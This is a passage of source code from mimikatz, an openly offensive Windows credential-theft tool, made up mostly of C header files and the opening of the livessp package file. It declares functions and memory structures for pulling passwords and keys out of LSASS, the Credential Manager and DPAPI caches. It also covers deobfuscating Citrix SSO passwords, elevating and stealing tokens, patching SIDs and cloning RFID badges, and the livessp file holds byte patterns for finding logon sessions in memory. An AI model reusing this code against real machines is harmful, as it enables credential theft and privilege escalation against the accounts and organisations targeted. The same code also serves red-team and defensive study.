14 | NTSTATUS kuhl_m_c_service_init();
15 | NTSTATUS kuhl_m_c_service_clean();
16 |
17 | typedef BOOL (* KUHL_M_SERVICE_FUNC) (PCWSTR serviceName);
18 | NTSTATUS genericFunction(KUHL_M_SERVICE_FUNC function, wchar_t * text, int argc, wchar_t * argv[], DWORD dwControl);
19 |
20 | NTSTATUS kuhl_m_service_start(int argc, wchar_t * argv[]);
21 | NTSTATUS kuhl_m_service_remove(int argc, wchar_t * argv[]);
22 | NTSTATUS kuhl_m_service_stop(int argc, wchar_t * argv[]);
23 | NTSTATUS kuhl_m_service_suspend(int argc, wchar_t * argv[]);
24 | NTSTATUS kuhl_m_service_resume(int argc, wchar_t * argv[]);
25 | NTSTATUS kuhl_m_service_preshutdown(int argc, wchar_t * argv[]);
26 | NTSTATUS kuhl_m_service_shutdown(int argc, wchar_t * argv[]);
27 | NTSTATUS kuhl_m_service_list(int argc, wchar_t * argv[]);
28 | NTSTATUS kuhl_m_service_installme(int argc, wchar_t * argv[]);
29 | NTSTATUS kuhl_m_service_uninstallme(int argc, wchar_t * argv[]);
30 | NTSTATUS kuhl_m_service_me(int argc, wchar_t * argv[]);
31 |
32 | void WINAPI kuhl_m_service_CtrlHandler(DWORD Opcode);
33 | void WINAPI kuhl_m_service_Main(DWORD argc, LPTSTR *argv);
--------------------------------------------------------------------------------
/mimikatz/modules/kuhl_m_service_remote.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #pragma once
7 | #include "kuhl_m_service.h"
8 | #if defined(SERVICE_INCONTROL)
9 | #include "../modules/kull_m_remotelib.h"
10 | #include "../modules/kull_m_patch.h"
11 |
12 | typedef DWORD ( __stdcall * PSCSENDCONTROL_STD) (LPCWSTR lpServiceName, PVOID arg1, PVOID arg2, int arg3, DWORD dwControl, DWORD arg4, PVOID arg5, DWORD arg6, PVOID arg7, DWORD arg8, DWORD arg9, PVOID arg10, PVOID arg11, PVOID arg12);
13 | typedef DWORD (__fastcall * PSCSENDCONTROL_FAST)(LPCWSTR lpServiceName, PVOID arg1, PVOID arg2, int arg3, DWORD dwControl, DWORD arg4, PVOID arg5, DWORD arg6, PVOID arg7, DWORD arg8, DWORD arg9, PVOID arg10, PVOID arg11, PVOID arg12);
14 |
15 | DWORD WINAPI kuhl_service_sendcontrol_std_thread(PREMOTE_LIB_DATA lpParameter);
16 | DWORD kuhl_service_sendcontrol_std_thread_end();
17 | DWORD WINAPI kuhl_service_sendcontrol_fast_thread(PREMOTE_LIB_DATA lpParameter);
18 | DWORD kuhl_service_sendcontrol_fast_thread_end();
19 |
20 | BOOL kuhl_service_sendcontrol_inprocess(PWSTR ServiceName, DWORD dwControl);
21 | #endif
--------------------------------------------------------------------------------
/mimikatz/modules/kuhl_m_sid.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #pragma once
7 | #include "kuhl_m.h"
8 | #include "../modules/kull_m_ldap.h"
9 | #include "../modules/kull_m_token.h"
10 | #include "../modules/kull_m_service.h"
11 | #include "../modules/kull_m_patch.h"
12 |
13 | const KUHL_M kuhl_m_sid;
14 |
15 | NTSTATUS kuhl_m_sid_lookup(int argc, wchar_t * argv[]);
16 | NTSTATUS kuhl_m_sid_query(int argc, wchar_t * argv[]);
17 | NTSTATUS kuhl_m_sid_modify(int argc, wchar_t * argv[]);
18 | NTSTATUS kuhl_m_sid_add(int argc, wchar_t * argv[]);
19 | NTSTATUS kuhl_m_sid_clear(int argc, wchar_t * argv[]);
20 | NTSTATUS kuhl_m_sid_patch(int argc, wchar_t * argv[]);
21 |
22 | void kuhl_m_sid_displayMessage(PLDAP ld, PLDAPMessage pMessage);
23 | BOOL kuhl_m_sid_quickSearch(int argc, wchar_t * argv[], BOOL needUnique, PCWCHAR system, PLDAP *ld, PLDAPMessage *pMessage);
24 | PWCHAR kuhl_m_sid_filterFromArgs(int argc, wchar_t * argv[]);
--------------------------------------------------------------------------------
/mimikatz/modules/kuhl_m_sr98.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #pragma once
7 | #include "kuhl_m.h"
8 | #include "../../modules/kull_m_sr98.h"
9 |
10 | const KUHL_M kuhl_m_sr98;
11 |
12 | NTSTATUS kuhl_m_sr98_beep(int argc, wchar_t * argv[]);
13 | NTSTATUS kuhl_m_sr98_raw(int argc, wchar_t * argv[]);
14 | NTSTATUS kuhl_m_sr98_b0(int argc, wchar_t * argv[]);
15 | NTSTATUS kuhl_m_sr98_list(int argc, wchar_t * argv[]);
16 | NTSTATUS kuhl_m_sr98_hid26(int argc, wchar_t * argv[]);
17 | NTSTATUS kuhl_m_sr98_em4100(int argc, wchar_t * argv[]);
18 | NTSTATUS kuhl_m_sr98_noralsy(int argc, wchar_t * argv[]);
19 | NTSTATUS kuhl_m_sr98_nedap(int argc, wchar_t * argv[]);
20 |
21 | #define C_FIXED0 0x71
22 | #define C_FIXED1 0x40
23 | #define C_UNK0 0x00
24 | #define C_UNK1 0x00
25 |
26 | typedef struct _KUHL_M_SR98_RAW_BLOCK {
27 | UCHAR toProg;
28 | ULONG data;
29 | } KUHL_M_SR98_RAW_BLOCK, *PKUHL_M_SR98_RAW_BLOCK;
30 |
31 | BOOL kuhl_m_sr98_sendBlocks(ULONG *blocks, UCHAR nb);
32 | void kuhl_m_sr98_b0_descr(ULONG b0);
33 |
34 | UCHAR kuhl_m_sr98_hid26_Manchester_4bits(UCHAR data4);
35 | void kuhl_m_sr98_hid26_blocks(ULONG blocks[4], UCHAR FacilityCode, USHORT CardNumber, PULONGLONG pWiegand);
36 |
37 | void kuhl_m_sr98_em4100_blocks(ULONG blocks[3], ULONGLONG CardNumber);
38 |
39 | void kuhl_m_sr98_noralsy_blocks(ULONG blocks[4], ULONG CardNumber, USHORT Year);
40 |
41 | USHORT kuhl_m_sr98_crc16_ccitt_1021(const UCHAR *data, ULONG len);
42 | void kuhl_m_sr98_nedap_blocks(ULONG blocks[5], BOOLEAN isLong, UCHAR SubType, USHORT CustomerCode, ULONG CardNumber);
--------------------------------------------------------------------------------
/mimikatz/modules/kuhl_m_standard.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #pragma once
7 | #include "kuhl_m.h"
8 | #include "../../modules/kull_m_string.h"
9 | #include "../../modules/kull_m_file.h"
10 | #include "../../modules/kull_m_process.h"
11 | #include "../../modules/kull_m_net.h"
12 | #include "../../modules/kull_m_cabinet.h"
13 |
14 | const KUHL_M kuhl_m_standard;
15 |
16 | NTSTATUS kuhl_m_standard_cls(int argc, wchar_t * argv[]);
17 | NTSTATUS kuhl_m_standard_exit(int argc, wchar_t * argv[]);
18 | NTSTATUS kuhl_m_standard_cite(int argc, wchar_t * argv[]);
19 | NTSTATUS kuhl_m_standard_answer(int argc, wchar_t * argv[]);
20 | NTSTATUS kuhl_m_standard_coffee(int argc, wchar_t * argv[]);
21 | NTSTATUS kuhl_m_standard_sleep(int argc, wchar_t * argv[]);
22 | NTSTATUS kuhl_m_standard_log(int argc, wchar_t * argv[]);
23 | NTSTATUS kuhl_m_standard_base64(int argc, wchar_t * argv[]);
24 | NTSTATUS kuhl_m_standard_version(int argc, wchar_t * argv[]);
25 | NTSTATUS kuhl_m_standard_cd(int argc, wchar_t * argv[]);
26 | NTSTATUS kuhl_m_standard_localtime(int argc, wchar_t * argv[]);
27 | NTSTATUS kuhl_m_standard_hostname(int argc, wchar_t * argv[]);
28 | NTSTATUS kuhl_m_standard_test(int argc, wchar_t * argv[]);
--------------------------------------------------------------------------------
/mimikatz/modules/kuhl_m_sysenvvalue.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #pragma once
7 | #include "kuhl_m.h"
8 | #include "../modules/kull_m_string.h"
9 |
10 | const KUHL_M kuhl_m_sysenv;
11 |
12 | NTSTATUS kuhl_m_sysenv_list(int argc, wchar_t * argv[]);
13 | NTSTATUS kuhl_m_sysenv_get(int argc, wchar_t * argv[]);
14 | NTSTATUS kuhl_m_sysenv_set(int argc, wchar_t * argv[]);
15 | NTSTATUS kuhl_m_sysenv_del(int argc, wchar_t * argv[]);
16 |
17 | void kuhl_m_sysenv_display_attributes(DWORD attributes);
18 | void kuhl_m_sysenv_display_vendorGuid(LPCGUID guid);
19 |
20 | typedef struct _KUHL_M_SYSENV_GUID_STORE {
21 | const GUID guid;
22 | LPCWSTR name;
23 | } KUHL_M_SYSENV_GUID_STORE, *PKUHL_M_SYSENV_GUID_STORE;
24 |
25 | #define VARIABLE_ATTRIBUTE_NON_VOLATILE 0x00000001
26 |
27 | #define VARIABLE_INFORMATION_NAMES 1
28 | #define VARIABLE_INFORMATION_VALUES 2
29 |
30 | typedef struct _VARIABLE_NAME {
31 | ULONG NextEntryOffset;
32 | GUID VendorGuid;
33 | WCHAR Name[ANYSIZE_ARRAY];
34 | } VARIABLE_NAME, *PVARIABLE_NAME;
35 |
36 | typedef struct _VARIABLE_NAME_AND_VALUE {
37 | ULONG NextEntryOffset;
38 | ULONG ValueOffset;
39 | ULONG ValueLength;
40 | ULONG Attributes;
41 | GUID VendorGuid;
42 | WCHAR Name[ANYSIZE_ARRAY];
43 | //UCHAR Value[ANYSIZE_ARRAY];
44 | } VARIABLE_NAME_AND_VALUE, *PVARIABLE_NAME_AND_VALUE;
45 |
46 | NTSYSCALLAPI NTSTATUS NTAPI NtQuerySystemEnvironmentValue (__in PUNICODE_STRING VariableName, __out_bcount(ValueLength) PWSTR VariableValue, __in USHORT ValueLength, __out_opt PUSHORT ReturnLength);
47 | NTSYSCALLAPI NTSTATUS NTAPI NtSetSystemEnvironmentValue (__in PUNICODE_STRING VariableName, __in PUNICODE_STRING VariableValue);
48 | NTSYSCALLAPI NTSTATUS NTAPI NtQuerySystemEnvironmentValueEx (__in PUNICODE_STRING VariableName, __in LPGUID VendorGuid, __out_bcount_opt(*ValueLength) PVOID Value, __inout PULONG ValueLength, __out_opt PULONG Attributes);
49 | NTSYSCALLAPI NTSTATUS NTAPI NtSetSystemEnvironmentValueEx (__in PUNICODE_STRING VariableName, __in LPGUID VendorGuid, __in_bcount_opt(ValueLength) PVOID Value, __in ULONG ValueLength, __in ULONG Attributes);
50 | NTSYSCALLAPI NTSTATUS NTAPI NtEnumerateSystemEnvironmentValuesEx (__in ULONG InformationClass, __out PVOID Buffer, __inout PULONG BufferLength);
--------------------------------------------------------------------------------
/mimikatz/modules/kuhl_m_token.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #pragma once
7 | #include "kuhl_m.h"
8 | #include "../modules/kull_m_token.h"
9 | #include "../modules/kull_m_net.h"
10 | #include "kuhl_m_process.h"
11 |
12 | const KUHL_M kuhl_m_token;
13 |
14 | //typedef enum _KUHL_M_TOKEN_ELEVATE_DATA_TYPE_FILTER {
15 | // TypeFree,
16 | // TypeAnonymous,
17 | // TypeIdentity,
18 | // TypeDelegation,
19 | // TypeImpersonate,
20 | // TypePrimary,
21 | //} KUHL_M_TOKEN_ELEVATE_DATA_TYPE_FILTER, *PKUHL_M_TOKEN_ELEVATE_DATA_TYPE_FILTER;
22 |
23 | typedef struct _KUHL_M_TOKEN_ELEVATE_DATA {
24 | PSID pSid;
25 | PCWSTR pUsername;
26 | DWORD tokenId;
27 | BOOL elevateIt;
28 | BOOL runIt;
29 | PCWSTR pCommandLine;
30 | BOOL isSidDirectUser;
31 |
32 | //KUHL_M_TOKEN_ELEVATE_DATA_TYPE_FILTER filter;
33 | //BOOL isNeeded;
34 | //BOOL isMinimal;
35 | } KUHL_M_TOKEN_ELEVATE_DATA, *PKUHL_M_TOKEN_ELEVATE_DATA;
36 |
37 | void kuhl_m_token_displayAccount_sids(UCHAR l, DWORD count, PSID_AND_ATTRIBUTES sids);
38 | void kuhl_m_token_displayAccount(HANDLE hToken, BOOL full);
39 |
40 | NTSTATUS kuhl_m_token_whoami(int argc, wchar_t * argv[]);
41 | NTSTATUS kuhl_m_token_list(int argc, wchar_t * argv[]);
42 | NTSTATUS kuhl_m_token_elevate(int argc, wchar_t * argv[]);
43 | NTSTATUS kuhl_m_token_run(int argc, wchar_t * argv[]);
44 | NTSTATUS kuhl_m_token_revert(int argc, wchar_t * argv[]);
45 |
46 | NTSTATUS kuhl_m_token_list_or_elevate(int argc, wchar_t * argv[], BOOL elevate, BOOL runIt);
47 | BOOL CALLBACK kuhl_m_token_list_or_elevate_callback(HANDLE hToken, DWORD ptid, PVOID pvArg);
--------------------------------------------------------------------------------
/mimikatz/modules/misc/kuhl_m_misc_citrix.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #pragma once
7 | #include "../kuhl_m_misc.h"
8 | #include "../../../modules/kull_m_memory.h"
9 | #include "../../../modules/kull_m_process.h"
10 |
11 | extern const KUHL_M kuhl_m_misc_citrix;
12 |
13 | #pragma pack(push, 4)
14 | typedef struct _CITRIX_CREDENTIALS {
15 | wchar_t username[0x100];
16 | wchar_t domain[0x100];
17 | DWORD cbPassword;
18 | wchar_t password[0x100];
19 | DWORD dwFlags; // type ?
20 | } CITRIX_CREDENTIALS, * PCITRIX_CREDENTIALS;
21 |
22 | typedef struct _CITRIX_PACKED_CREDENTIALS {
23 | DWORD cbStruct;
24 | DWORD cbData;
25 | DWORD dwFlags;
26 | BYTE Data[SIZE_ALIGN(sizeof(CITRIX_CREDENTIALS), CRYPTPROTECTMEMORY_BLOCK_SIZE)];
27 | } CITRIX_PACKED_CREDENTIALS, * PCITRIX_PACKED_CREDENTIALS;
28 | #pragma pack(pop)
29 |
30 | void kuhl_m_misc_citrix_logonpasswords(int argc, wchar_t* argv[]);
31 |
32 | BOOL CALLBACK Citrix_Each_SSO_Program(PSYSTEM_PROCESS_INFORMATION pSystemProcessInformation, PVOID pvArg);
33 | void Citrix_SSO_Program_args(HANDLE hRemoteProcess, PCUNICODE_STRING puCommandLine);
34 | void Citrix_SSO_Program_FileMapping(HANDLE hRemoteProcess, HANDLE hRemoteFileMapping);
35 |
36 | void CitrixPasswordObfuscate(PBYTE pbData, DWORD cbData);
37 | void CitrixPasswordDesobfuscate(PBYTE pbData, DWORD cbData);
--------------------------------------------------------------------------------
/mimikatz/modules/misc/kuhl_m_misc_djoin.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #pragma once
7 | #include "../kuhl_m_misc.h"
8 | #include "../../../modules/kull_m_crypto.h"
9 | #include "../../../modules/rpc/kull_m_rpc_ms-odj.h"
10 |
11 | void kuhl_m_misc_djoin(int argc, wchar_t* argv[]);
12 |
13 | void kuhl_m_misc_djoin_ODJ_PROVISION_DATA_descr(DWORD level, ULONG cbBlob, PBYTE pBlob);
14 |
15 | void kuhl_m_misc_djoin_ODJ_WIN7BLOB_descr(DWORD level, ULONG cbBlob, PBYTE pBlob);
16 | void kuhl_m_misc_djoin_OP_PACKAGE_descr(DWORD level, ULONG cbBlob, PBYTE pBlob);
17 | void kuhl_m_misc_djoin_OP_PACKAGE_PART_COLLECTION_descr(DWORD level, ULONG cbBlob, PBYTE pBlob);
18 | void kuhl_m_misc_djoin_OP_PACKAGE_PART_descr(DWORD level, POP_PACKAGE_PART pOpPackagePart);
19 |
20 | void kuhl_m_misc_djoin_OP_JOINPROV2_PART_descr(DWORD level, ULONG cbBlob, PBYTE pBlob);
21 | void kuhl_m_misc_djoin_OP_JOINPROV3_PART_descr(DWORD level, ULONG cbBlob, PBYTE pBlob);
22 |
23 | void kuhl_m_misc_djoin_OP_CERT_PART_descr(DWORD level, ULONG cbBlob, PBYTE pBlob);
24 | void kuhl_m_misc_djoin_OP_CERT_PFX_STORE_descr(DWORD level, POP_CERT_PFX_STORE pPfxStore);
25 | void kuhl_m_misc_djoin_OP_CERT_SST_STORE_descr(DWORD level, POP_CERT_SST_STORE pSstStore);
26 |
27 | void kuhl_m_misc_djoin_OP_POLICY_PART_descr(DWORD level, ULONG cbBlob, PBYTE pBlob);
28 | void kuhl_m_misc_djoin_OP_POLICY_ELEMENT_LIST_descr(DWORD level, POP_POLICY_ELEMENT_LIST pElementList);
29 | void kuhl_m_misc_djoin_OP_POLICY_ELEMENT_descr(DWORD level, POP_POLICY_ELEMENT pElement);
--------------------------------------------------------------------------------
/mimikatz/modules/sekurlsa/crypto/kuhl_m_sekurlsa_nt6.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #pragma once
7 | #include "../globals_sekurlsa.h"
8 |
9 | // generic in KULL_M_CRYPTO.H
10 | typedef struct _KIWI_BCRYPT_KEY8 {
11 | ULONG size;
12 | ULONG tag; // 'MSSK'
13 | ULONG type;
14 | ULONG unk0;
15 | ULONG unk1;
16 | ULONG unk2;
17 | ULONG unk3;
18 | PVOID unk4; // before, align in x64
19 | KIWI_HARD_KEY hardkey;
20 | } KIWI_BCRYPT_KEY8, *PKIWI_BCRYPT_KEY8;
21 |
22 | typedef struct _KIWI_BCRYPT_KEY81 {
23 | ULONG size;
24 | ULONG tag; // 'MSSK'
25 | ULONG type;
26 | ULONG unk0;
27 | ULONG unk1;
28 | ULONG unk2;
29 | ULONG unk3;
30 | ULONG unk4;
31 | PVOID unk5; // before, align in x64
32 | ULONG unk6;
33 | ULONG unk7;
34 | ULONG unk8;
35 | ULONG unk9;
36 | KIWI_HARD_KEY hardkey;
37 | } KIWI_BCRYPT_KEY81, *PKIWI_BCRYPT_KEY81;
38 |
39 | typedef struct _KIWI_BCRYPT_HANDLE_KEY {
40 | ULONG size;
41 | ULONG tag; // 'UUUR'
42 | PVOID hAlgorithm;
43 | PKIWI_BCRYPT_KEY key;
44 | PVOID unk0;
45 | } KIWI_BCRYPT_HANDLE_KEY, *PKIWI_BCRYPT_HANDLE_KEY;
46 |
47 | typedef struct _KIWI_BCRYPT_GEN_KEY {
48 | BCRYPT_ALG_HANDLE hProvider;
49 | BCRYPT_KEY_HANDLE hKey;
50 | PBYTE pKey;
51 | ULONG cbKey;
52 | } KIWI_BCRYPT_GEN_KEY, *PKIWI_BCRYPT_GEN_KEY;
53 |
54 | typedef NTSTATUS (WINAPI * PBCRYPT_ENCRYPT) (__inout BCRYPT_KEY_HANDLE hKey, __in_bcount_opt(cbInput) PUCHAR pbInput, __in ULONG cbInput, __in_opt VOID *pPaddingInfo, __inout_bcount_opt(cbIV) PUCHAR pbIV, __in ULONG cbIV, __out_bcount_part_opt(cbOutput, *pcbResult) PUCHAR pbOutput, __in ULONG cbOutput, __out ULONG *pcbResult, __in ULONG dwFlags);
55 |
56 | NTSTATUS kuhl_m_sekurlsa_nt6_init();
57 | NTSTATUS kuhl_m_sekurlsa_nt6_clean();
58 | const PLSA_PROTECT_MEMORY kuhl_m_sekurlsa_nt6_pLsaProtectMemory, kuhl_m_sekurlsa_nt6_pLsaUnprotectMemory;
59 |
60 | NTSTATUS kuhl_m_sekurlsa_nt6_acquireKeys(PKUHL_M_SEKURLSA_CONTEXT cLsass, PKULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION lsassLsaSrvModule);
61 | BOOL kuhl_m_sekurlsa_nt6_acquireKey(PKULL_M_MEMORY_ADDRESS aLsassMemory, PKUHL_M_SEKURLSA_OS_CONTEXT pOs, PKIWI_BCRYPT_GEN_KEY pGenKey, LONG armOffset); // TODO:ARM64
62 |
63 | NTSTATUS kuhl_m_sekurlsa_nt6_LsaInitializeProtectedMemory();
64 | VOID kuhl_m_sekurlsa_nt6_LsaCleanupProtectedMemory();
65 | NTSTATUS kuhl_m_sekurlsa_nt6_LsaEncryptMemory(PUCHAR pMemory, ULONG cbMemory, BOOL Encrypt);
66 | VOID WINAPI kuhl_m_sekurlsa_nt6_LsaUnprotectMemory(IN PVOID Buffer, IN ULONG BufferSize);
67 | VOID WINAPI kuhl_m_sekurlsa_nt6_LsaProtectMemory(IN PVOID Buffer, IN ULONG BufferSize);
--------------------------------------------------------------------------------
/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa_sk.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #pragma once
7 | #include "globals_sekurlsa.h"
8 | #include "../modules/kull_m_crypto_sk.h"
9 | #include "kuhl_m_sekurlsa.h"
10 |
11 | typedef struct _KEYLIST_ENTRY {
12 | LIST_ENTRY navigator;
13 | BYTE key[32];
14 | DOUBLE entropy;
15 | } KEYLIST_ENTRY, *PKEYLIST_ENTRY;
16 |
17 | BOOL kuhl_m_sekurlsa_sk_candidatekey_add(BYTE key[32], DOUBLE entropy);
18 | void kuhl_m_sekurlsa_sk_candidatekey_delete(PKEYLIST_ENTRY entry);
19 | void kuhl_m_sekurlsa_sk_candidatekey_descr(PKEYLIST_ENTRY entry);
20 | void kuhl_m_sekurlsa_sk_candidatekeys_delete();
21 | void kuhl_m_sekurlsa_sk_candidatekeys_descr();
22 |
23 | DWORD kuhl_m_sekurlsa_sk_search(PBYTE data, DWORD size, BOOL light);
24 | DWORD kuhl_m_sekurlsa_sk_search_file(LPCWSTR filename);
25 |
26 | NTSTATUS kuhl_m_sekurlsa_sk_bootKey(int argc, wchar_t* argv[]);
27 | BOOL kuhl_m_sekurlsa_sk_tryDecode(PLSAISO_DATA_BLOB blob, PBYTE *output, DWORD *cbOutput);
--------------------------------------------------------------------------------
/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_credman.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #pragma once
7 | #include "../kuhl_m_sekurlsa.h"
8 |
9 | KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_credman_package;
10 |
11 | NTSTATUS kuhl_m_sekurlsa_credman(int argc, wchar_t * argv[]);
12 | void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_credman(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData);
13 |
14 | typedef struct _CREDMAN_INFOS {
15 | ULONG structSize;
16 | ULONG offsetFLink;
17 | ULONG offsetUsername;
18 | ULONG offsetDomain;
19 | ULONG offsetCbPassword;
20 | ULONG offsetPassword;
21 | } CREDMAN_INFOS, *PCREDMAN_INFOS;
22 |
23 | typedef struct _KIWI_CREDMAN_LIST_ENTRY_5 {
24 | ULONG cbEncPassword;
25 | PWSTR encPassword;
26 | ULONG unk0;
27 | ULONG unk1;
28 | PVOID unk2;
29 | PVOID unk3;
30 | PWSTR UserName;
31 | ULONG cbUserName;
32 | struct _KIWI_CREDMAN_LIST_ENTRY *Flink;
33 | struct _KIWI_CREDMAN_LIST_ENTRY *Blink;
34 | UNICODE_STRING server1;
35 | PVOID unk6;
36 | PVOID unk7;
37 | UNICODE_STRING user;
38 | ULONG unk8;
39 | UNICODE_STRING server2;
40 | } KIWI_CREDMAN_LIST_ENTRY_5, *PKIWI_CREDMAN_LIST_ENTRY_5;
41 |
42 | typedef struct _KIWI_CREDMAN_LIST_ENTRY_60 {
43 | ULONG cbEncPassword;
44 | PWSTR encPassword;
45 | ULONG unk0;
46 | ULONG unk1;
47 | PVOID unk2;
48 | PVOID unk3;
49 | PWSTR UserName;
50 | ULONG cbUserName;
51 | struct _KIWI_CREDMAN_LIST_ENTRY *Flink;
52 | struct _KIWI_CREDMAN_LIST_ENTRY *Blink;
53 | UNICODE_STRING type;
54 | PVOID unk5;
55 | UNICODE_STRING server1;
56 | PVOID unk6;
57 | PVOID unk7;
58 | PVOID unk8;
59 | PVOID unk9;
60 | PVOID unk10;
61 | UNICODE_STRING user;
62 | ULONG unk11;
63 | UNICODE_STRING server2;
64 | } KIWI_CREDMAN_LIST_ENTRY_60, *PKIWI_CREDMAN_LIST_ENTRY_60;
65 |
66 | typedef struct _KIWI_CREDMAN_LIST_ENTRY {
67 | ULONG cbEncPassword;
68 | PWSTR encPassword;
69 | ULONG unk0;
70 | ULONG unk1;
71 | PVOID unk2;
72 | PVOID unk3;
73 | PWSTR UserName;
74 | ULONG cbUserName;
75 | struct _KIWI_CREDMAN_LIST_ENTRY *Flink;
76 | struct _KIWI_CREDMAN_LIST_ENTRY *Blink;
77 | LIST_ENTRY unk4;
78 | UNICODE_STRING type;
79 | PVOID unk5;
80 | UNICODE_STRING server1;
81 | PVOID unk6;
82 | PVOID unk7;
83 | PVOID unk8;
84 | PVOID unk9;
85 | PVOID unk10;
86 | UNICODE_STRING user;
87 | ULONG unk11;
88 | UNICODE_STRING server2;
89 | } KIWI_CREDMAN_LIST_ENTRY, *PKIWI_CREDMAN_LIST_ENTRY;
90 |
91 | typedef struct _KIWI_CREDMAN_LIST_STARTER {
92 | ULONG unk0;
93 | PKIWI_CREDMAN_LIST_ENTRY start;
94 | //...
95 | } KIWI_CREDMAN_LIST_STARTER, *PKIWI_CREDMAN_LIST_STARTER;
96 |
97 | typedef struct _KIWI_CREDMAN_SET_LIST_ENTRY {
98 | struct _KIWI_CREDMAN_SET_LIST_ENTRY *Flink;
99 | struct _KIWI_CREDMAN_SET_LIST_ENTRY *Blink;
100 | ULONG unk0;
101 | PKIWI_CREDMAN_LIST_STARTER list1;
102 | PKIWI_CREDMAN_LIST_STARTER list2;
103 | // ...
104 | } KIWI_CREDMAN_SET_LIST_ENTRY, *PKIWI_CREDMAN_SET_LIST_ENTRY;
--------------------------------------------------------------------------------
/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_dpapi.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #pragma once
7 | #include "../kuhl_m_sekurlsa.h"
8 |
9 | KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_dpapi_lsa_package, kuhl_m_sekurlsa_dpapi_svc_package;
10 |
11 | NTSTATUS kuhl_m_sekurlsa_dpapi(int argc, wchar_t * argv[]);
12 | BOOL CALLBACK kuhl_m_sekurlsa_enum_callback_dpapi(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL LPVOID pOptionalData);
13 |
14 | typedef struct _KIWI_MASTERKEY_CACHE_ENTRY {
15 | struct _KIWI_MATERKEY_CACHE_ENTRY *Flink;
16 | struct _KIWI_MATERKEY_CACHE_ENTRY *Blink;
17 | LUID LogonId;
18 | GUID KeyUid;
19 | FILETIME insertTime;
20 | ULONG keySize;
21 | BYTE key[ANYSIZE_ARRAY];
22 | } KIWI_MASTERKEY_CACHE_ENTRY, *PKIWI_MASTERKEY_CACHE_ENTRY;
--------------------------------------------------------------------------------
/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_livessp.c:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #include "kuhl_m_sekurlsa_livessp.h"
7 | #if !defined(_M_ARM64)
8 | #if defined(_M_X64)
9 | BYTE PTRN_WALL_LiveLocateLogonSession[] = {0x74, 0x25, 0x8b};
10 | KULL_M_PATCH_GENERIC LiveReferences[] = {
11 | {KULL_M_WIN_BUILD_8, {sizeof(PTRN_WALL_LiveLocateLogonSession), PTRN_WALL_LiveLocateLogonSession}, {0, NULL}, {-7}},
12 | };
13 | #elif defined(_M_IX86)
14 | BYTE PTRN_WALL_LiveLocateLogonSession[] = {0x8b, 0x16, 0x39, 0x51, 0x24, 0x75, 0x08};
15 | KULL_M_PATCH_GENERIC LiveReferences[] = {
16 | {KULL_M_WIN_BUILD_8, {sizeof(PTRN_WALL_LiveLocateLogonSession), PTRN_WALL_LiveLocateLogonSession}, {0, NULL}, {-8}},
17 | };
18 | #endif
19 |
20 | PKIWI_LIVESSP_LIST_ENTRY LiveGlobalLogonSessionList = NULL;
21 |
22 | KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_livessp_package = {L"livessp", kuhl_m_sekurlsa_enum_logon_callback_livessp, FALSE, L"livessp.dll", {{{NULL, NULL}, 0, 0, NULL}, FALSE, FALSE}};
